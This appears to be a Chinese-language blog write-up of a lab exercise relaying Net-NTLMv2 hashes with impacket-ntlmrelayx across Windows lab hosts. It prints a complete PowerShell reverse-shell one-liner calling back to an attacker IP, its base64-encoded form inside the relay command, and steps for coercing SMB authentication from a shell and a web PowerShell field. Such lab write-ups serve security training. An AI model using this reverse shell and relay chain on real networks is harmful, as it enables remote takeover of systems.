中繼(Relaying) Net-NTLMv2

 中繼(Relaying) Net-NTLMv2


靶機群組 #1 : 192.168.197.211、#2 : 192.168.197.212,已知帳號 files02admin

攻擊機 IP : 192.168.45.228



Relaying 中繼的意思就是收到後轉發到攻擊目標所以稱為 relay

還記得前面學過得先將 powershell 建立 reverse shell 的指令做出來如下

在 kali 開啟 powershell 編輯器 --> 輸入 pwsh

將整個 one-liner 轉成變數 $Text,如下的 PowerShell one-liner

要連到本機(192.168.45.228)建立的 4444 Port Listen

PS> $Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.228",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

將 $Text 先做 Encoding 轉成 $Bytes

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

再轉 Base64

$EncodedText =[Convert]::ToBase64String($Bytes)

輸出 Encoding Base64 的碼

$EncodedText

輸出結果如下



接著我們要在攻擊主機啟動 impacket-ntlmrelayx,整個指令如下

啟動 impacket-ntlmrelayx 使用參數

 --no-http-server : 停用 HTTP 伺服器,因為我們要 Relay SMB 連接

 -smb2support : 新增對 SMB2 協定的支援

 -t : Relay 目標設定為 FILES02 192.168.197.212

 -c : 設定要執行的命令,就是我們上面 PowerShell 包成 base64 編碼的指令

└─PS> impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.197.212 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="



攻擊機起 nc 4444 Port Listen




可以開始發動攻擊了,我們要攻擊的機器是 FILES01 192.168.197.211

前提條件是已經拿到 remote shell 並起在 5555 Port,所以直接 nc 進去

確認一下 IP(ipconfig),看一下 whoami 確認 remote shell 的使用者帶的是 files02admin




一樣透過 remote shell 執行網路存取,讓他來存取我們的攻擊機 dir \\192.168.45.228\test





回到攻擊機查看會看到 192.168.197.211 連線進來了,然後我們直接 relay 到 192.168.197.212

此時會帶 files02admin 這個帳號與存取 hash 權限直接轉送到 192.168.197.212




回到 4444 Port Listen 可以看到 192.168.197.212 連線進來了

查看 ipconfig、hostname 等確認是 FILES02

直接 type C:\Users\files02admin\Desktop\flag.txt 拿 flag 吧









練習 2

靶機 #3 : 192.168.197.202 已知使用者帳號 anastasia,是 web server、#4 : 192.168.197.212

攻擊機 : 192.168.45.228


通常有 Web 就是進入點,第一步 rustscan 看一下 #3 的 web service

└─$ rustscan -a 192.168.197.202 --scripts none --ulimit 500



Web Service 跑在 8000 Port 上,登入後看到有一個欄位寫支援 PowerShell




這是 Net-NTLMv2 Relay 攻擊練習,所以先啟動 impacket-ntlmrelayx 吧

└─PS> impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.197.212 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA4ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="                                                                                                   



網頁輸入 whoami 送到 Burp Suite 查看一下,發現是個 Web 版的 PowerShell



修改內容送出 \\192.168.45.228\test 到攻擊機是是看會否送出 hash



impacket-ntlmrelayx 進來了




nc 4444 port listen 也進來了,直接拿 flag 吧






留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)